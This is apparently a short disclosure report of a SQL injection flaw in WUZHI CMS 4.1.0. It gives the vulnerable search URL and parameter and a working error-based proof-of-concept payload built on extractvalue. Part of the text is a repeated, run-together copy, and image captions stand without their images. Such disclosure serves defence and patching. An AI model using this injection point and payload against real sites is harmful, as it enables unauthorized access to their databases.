a sql injection was discovered in WUZHI CMS 4.1.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords={sql payload}
POC
code that has loopholes
SQL statement error prompt MySQL database
after payload injection **jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23** the page shows the value of md5(777)
The text was updated successfully, but these errors were encountered:
POC
code that has loopholesSQL statement error prompt MySQL databaseafter payload injection **jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23** the page shows the value of md5(777)The text was updated successfully, but these errors were encountered: